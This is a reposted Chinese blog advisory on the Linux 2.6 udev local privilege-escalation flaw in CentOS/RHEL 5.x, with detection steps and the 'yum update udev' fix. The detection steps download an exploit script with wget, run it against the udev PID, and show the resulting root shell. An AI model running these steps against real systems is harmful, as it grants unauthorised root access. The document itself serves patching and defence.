关于Linux 2.6kernel udev 漏洞的检测及修补

转自：http://blog.chinaunix.net/uid-7387830-id-119510.html

最近闹的很凶的linux udev漏洞对2.6系列的CentOS/RHEL 5.x（除了5.3）都有效，而对2.4系列的则无效，对于CentOS/RHEL
4.x 经过测试，按本文攻击方法无效，但是否真的无效还有待真正高手验证！请大家必须打起12分精神。赶紧升级。ExtMail团队已经将所有我们掌控的Linux服务器（2.6
kernel，5.x 系列）全部升级完毕。以下是检测方法和升级方法，请路过使用受影响的linux系统的朋友一定要参考并升级，否则很容易出问题。这次可以通过任意web程序来实现攻击，而且成功率几乎100%。

请看过此帖的朋友帮忙顶一下帖，今天测了好几个服务器都有这个问题，全都修复了。

检测方法：

引用:
1）下载攻击脚本：

wget http://www.extmail.org/source/exploit-udev-8478

2）获得udev进程号

执行：ps ax|grep udev|grep -v grep|awk {'print $1'} 获得udev进程号，然后将此数字减1作为

exploit-udev-8478的参数，例如命令结果为143则参数为142

3）执行：

sh exploit-udev-8478 142

suid.c: In function ‘main’:

suid.c:3: warning: incompatible implicit declaration of built-in function ‘execl’

sh-3.1#

然后id 看看：

uid=0(root) gid=0(root) groups=65530(hzqbbc)

顺利获得root权限，如果无法获得root权限，要多执行脚本几次，一般第二次即可获得root权限。

解决/预防方法

唯一的就是要立刻升级udev软件包，此软件包升级后不需要重启动。方法很简单，请升级对应版本的官方最新udev，尤其要注意查看是否将这个漏洞补掉，EMOS用户可以很简单的用yum升级：

yum update udev

升级完毕后再用检测方法检测一遍以确保没有问题！强烈建议再重新做检测时，执行以下命令清除掉上一次入侵成功的临时文件，否则升级完也会攻击成功的。

以root权限执行： 

引用:
rm -rf /tmp/libno_ex*

rm -rf /tmp/suid

rm -rf /tmp/udev